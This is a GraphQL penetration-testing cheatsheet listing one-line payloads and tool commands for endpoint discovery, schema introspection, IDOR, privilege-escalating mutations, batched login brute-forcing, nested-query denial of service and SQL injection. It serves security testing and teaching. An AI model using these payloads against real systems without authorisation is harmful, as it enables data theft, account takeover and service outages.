← All Cheatsheets
web-pentest

GraphQL Attacks

GraphQL security testing — endpoint discovery and engine fingerprinting, introspection (and recovery when disabled), IDOR/authz via nodes & mutations, batching rate-limit bypass, DoS and injection.

1 views Jun 2026 lazyhackers
Discovery (3)
POST /graphql {"query":"{__typename}"}
Confirm a GraphQL endpoint
discovery
paths: /graphql /api/graphql /v1/graphql /graphiql /graphql/console
Hunt the endpoint + any exposed IDE
discovery endpoints
graphw00f -d -f -t https://target.com/graphql
Fingerprint the GraphQL engine
discovery graphw00f
Introspection (4)
{__schema{types{name fields{name}}}}
Full introspection — dump the schema
introspection recon
{__schema{queryType{fields{name}} mutationType{fields{name}}}}
List all queries and mutations
introspection
{__type(name:"User"){fields{name type{name kind}}}}
Inspect a specific type's fields
introspection type
clairvoyance -o schema.json https://target.com/graphql
Recover the schema even when introspection is disabled
introspection clairvoyance
Authz / IDOR (3)
{user(id:1002){email phone}}
IDOR via a node argument
idor authz
mutation{updateUser(id:1002,role:"admin"){id}}
Authz bypass / mass assignment via a mutation
authz mutation
{node(id:"VXNlcjoxMDAy"){...on User{email}}}
Relay global-id IDOR (base64 of type:id)
idor relay
Rate-Limit Bypass (Batching) (2)
{a:login(u:"x",p:"1"){t} b:login(u:"x",p:"2"){t} c:login(u:"x",p:"3"){t}}
Alias many attempts in ONE request to beat rate limits
batching bruteforce
[{"query":"mutation{...}"},{"query":"mutation{...}"}]
Array/JSON batching — send many operations at once
batching
DoS (2)
query{a{b{a{b{a{b{name}}}}}}}
Deeply nested / circular query to exhaust resources
dos nesting
{__schema{types{fields{type{fields{type{name}}}}}}}
Field-duplication / alias amplification
dos amplification
Injection & Tooling (3)
{user(id:"1 OR 1=1"){id}}
SQL/NoSQL injection through a GraphQL argument
injection sqli
InQL (Burp) / graphql-cop / batchql
Tooling — schema parsing, security audit, batching attacks
tooling
nuclei -tags graphql -u https://target.com/graphql
Automated GraphQL misconfiguration checks
tooling nuclei

Related Articles

5
Web Hacking

JSON and YAML Unsafe Deserialization

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …

20m read
Web Hacking

Supply Chain Attacks

Deep technical guide to software supply chain attacks — dependency confusion, malicious np…

16m read
Web Hacking

Cross-Site Scripting Mastery

Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…

19m read
Web Hacking

File Upload to RCE

Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…

12m read
Web Hacking

Advanced SSRF

Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…

16m read

Related Courses

2
Intermediate

Web Application Penetration Testing

Master web hacking from recon to reporting

30 · 9.3h
Intermediate

Bug Bounty Hunting — From Recon to Bounty

The practical playbook for finding real bugs on real targets. Recon methodology, vulnerabi…

0 · 7.2h